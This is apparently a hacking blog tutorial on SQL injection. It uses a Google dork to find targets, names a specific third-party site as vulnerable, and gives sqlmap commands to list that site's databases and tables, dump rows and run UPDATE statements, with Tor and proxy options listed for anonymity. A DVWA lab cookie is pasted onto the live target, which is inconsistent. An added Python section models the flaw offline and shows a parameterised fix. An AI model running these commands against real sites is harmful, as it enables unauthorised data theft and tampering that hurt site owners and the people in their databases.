Hacking remote databases using SQL injection

Understanding SQL Injection

SQL injection is an attack technique in which attacker-controlled input (here, the value of a URL query-string parameter) is concatenated straight into an application's SQL query, so that the database parses part of the input as SQL rather than as data. Against a vulnerable website it can be used to read data the attacker should not see, tamper with or delete existing data, deface the site, and more. SQL injection is therefore one of the most severe web vulnerabilities: it can expose an entire backend database and harm everyone whose data is in it.

In this blog, we will demonstrate how to identify a website susceptible to SQL injection and exploit the vulnerability using a tool called SQLMap. We'll start by using Google dorks to locate a vulnerable site. If you're unfamiliar with Google dorks, please read my previous blog.

Using Google Dorks to Find Vulnerable Sites

A simple Google dork to identify potential SQL injection vulnerabilities is:

inurl:index.php?id=

This query returns numerous search results: pages that take a numeric id from the query string, which is the classic pattern for a database lookup. Any of them may be vulnerable if the id value reaches the SQL query without being validated or escaped. As an example, let's investigate one of the search results.

Quick Check for SQL Injection Vulnerability

From the search results, I found a site, karaoke.co.nz, that is vulnerable to SQL injection. By visiting:

http://karaoke.co.nz/items/index.php?id=37

and appending a single quote to the end of this URL:

http://karaoke.co.nz/items/index.php?id=37'

we get a database error rather than an application-level "not found" message, which shows that the id value is passed into the query unescaped:

Unable to query local database to select Identifier
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 select * from Category where Identifier = 37'

The echoed query shows exactly why: the raw value of id is concatenated into select * from Category where Identifier = 37, so the stray quote breaks the SQL syntax. An application that validated id as an integer, or bound it as a prepared-statement parameter, would never have reached the database parser with that quote. This confirms the site's vulnerability. Below is a partial dump of one of the database tables from this site.

Using SQLMap

To exploit this vulnerability, we'll use SQLMap. SQLMap is a Python script, so first download and install Python, then download SQLMap from its project page and unpack it; no separate build step is needed.

Once installed, navigate to the SQLMap directory and run the following command to familiarize yourself with SQLMap:

python sqlmap.py --help

This command provides a detailed list of options available in SQLMap. Here are some key options:

  • -u URL, --url=URL: Target URL (e.g., “http://www.site.com/vuln.php?id=1“)
  • -g GOOGLEDORK: Process Google dork results as target URLs
  • --data=DATA: Data string to be sent through POST
  • --cookie=COOKIE: HTTP Cookie header value
  • --random-agent: Use randomly selected HTTP User-Agent header value
  • --proxy=PROXY: Use a proxy to connect to the target URL
  • --tor: Use Tor anonymity network

Dumping Databases with SQLMap

To enumerate the databases reachable through the vulnerable parameter, use the following command (quote the URL so the shell does not interpret the ? and & characters):

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

--cookie is only needed when the target page requires a session. The value shown here is carried over from a DVWA-style lab session (security=low is DVWA's difficulty-level cookie); a page that was injectable without logging in, as this one was in the quick check above, does not need it. SQLMap first confirms the injection and reports which technique it found usable (boolean-based blind, error-based, UNION query, stacked queries or time-based blind), then returns the database names, in this case claireg_karaoke and information_schema.

To list the tables in the application database, and in the MariaDB catalog information_schema (the metadata database SQLMap itself reads the schema from), use:

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" -D claireg_karaoke --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" -D information_schema --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

Once we have the table names, we can retrieve the column names of a table:

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" -D claireg_karaoke -T <table_name> --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

To dump the rows of the table, replace --columns with --dump; -C restricts the dump to the columns you name (omit it to dump every column):

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" -D claireg_karaoke -T <table_name> -C <column1,column2> --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dump

Changing Database Contents with SQLMap

In addition to dumping database contents, SQLMap can modify data by pushing arbitrary SQL statements through the injection point. This only works when the injection supports stacked queries, that is, when the application's database layer will execute a second statement appended after a semicolon. A UNION-based or boolean-based injection lets you read data but cannot run an UPDATE, and SQLMap will warn you that non-query statements need stacked-query support if you try.

To run a custom statement, use the --sql-query option. For example, to update a value in a table:

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE <table_name> SET <column_name>='new_value' WHERE <condition>"

For example, to change the username of the user with id=1 in a users table:

python sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE users SET username='new_username' WHERE id=1"

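The following is an added example, not code from the original post or from SQLMap: an offline model of the three things the post does against karaoke.co.nz (the single-quote check, table enumeration as --tables does it, and an UPDATE through --sql-query), run against an in-memory SQLite database instead of the site's MariaDB. Only the query select * from Category where Identifier = <id> comes from the post's error message; the Name column, the sample rows, the users table and the function names are assumptions made for illustration. It also shows the hardened lookup the site should have used, and why the UPDATE only succeeds when stacked queries are allowed.

```python
# Added example, not code from the original post: an offline model of the
# injection the post exploits, using an in-memory SQLite database instead of
# the MariaDB behind karaoke.co.nz. Only "select * from Category where
# Identifier = <id>" comes from the post's error message; the Name column, the
# sample rows and the users table are constructed stand-ins.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a Category table matching the post's query, plus
    the users table the post's UPDATE example refers to."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Category (Identifier INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Category VALUES (36, 'Pop'), (37, 'Rock'), (38, 'Country');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO users VALUES (1, 'admin');
        """
    )
    return conn


def vulnerable_lookup(conn, id_param):
    """Mirrors items/index.php?id=...: the raw query-string value is pasted into
    the SQL text, which is exactly what the echoed query in the error shows."""
    sql = "select * from Category where Identifier = " + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """Hardened form: validate the type, then bind the value as a parameter so
    the database never parses it as SQL. Anything non-numeric is rejected."""
    try:
        ident = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "select * from Category where Identifier = ?", (ident,)
    ).fetchall()


def quote_probe(conn):
    """The post's quick check: append a single quote and see whether the
    database, rather than the application, complains. Returns the error text,
    or None if the input was handled safely."""
    try:
        vulnerable_lookup(conn, "37'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def enumerate_tables(conn):
    """Manual version of what sqlmap's --tables automates: a UNION that reads the
    catalog through the injectable parameter. MariaDB exposes it as
    information_schema.tables; SQLite's equivalent is sqlite_master. The
    injected SELECT must return the same number of columns as the original."""
    payload = "37 UNION SELECT 0, name FROM sqlite_master WHERE type='table'"
    rows = vulnerable_lookup(conn, payload)
    return sorted(name for ident, name in rows if ident == 0)


def stacked_update(conn, stacked_allowed):
    """The post's UPDATE via --sql-query depends on stacked queries: a second
    statement riding behind the first after a semicolon. Python's sqlite3
    execute() refuses that (as PHP's mysqli_query does); executescript() allows
    it (as mysqli_multi_query does). Returns the username afterwards."""
    payload = "37; UPDATE users SET username='pwned' WHERE id=1"
    sql = "select * from Category where Identifier = " + payload
    try:
        if stacked_allowed:
            conn.executescript(sql)
        else:
            conn.execute(sql)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        pass  # second statement rejected: the UPDATE never ran
    return conn.execute("SELECT username FROM users WHERE id = 1").fetchone()[0]


if __name__ == "__main__":
    db = build_db()
    print("quote probe ->", quote_probe(db))
    print("normal id   ->", vulnerable_lookup(db, "37"))
    print("tautology   ->", vulnerable_lookup(db, "37 OR 1=1"))
    print("tables      ->", enumerate_tables(db))
    print("hardened    ->", safe_lookup(db, "37 OR 1=1"))
    print("no stacking ->", stacked_update(build_db(), False))
    print("stacking    ->", stacked_update(build_db(), True))
```

Run it with python3 and compare the two lookups: the vulnerable one errors on the quote, returns every row for 37 OR 1=1, and leaks the table list through a UNION, while the hardened one returns nothing for any of those payloads. The last two lines are the stacked-query caveat from the section above in miniature: the same UPDATE payload is silently dropped by a single-statement API and executed by a multi-statement one.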
Exploiting the Vulnerability Further


Besides dumping and modifying the database, the same parameter can be abused in a second way. Because the error page echoes the raw id value back into the HTML, markup or script placed in the query string is reflected to whoever loads the link, which is reflected cross-site scripting rather than SQL injection. The root cause is the same: the application never validates or encodes the query-string value before using it.

Disclaimer

The information provided here is for educational purposes only. Any unethical use of this information is not our responsibility.

Happy hacking!

skillcef

Skillcef admin responsible for creative content idea generation and publishing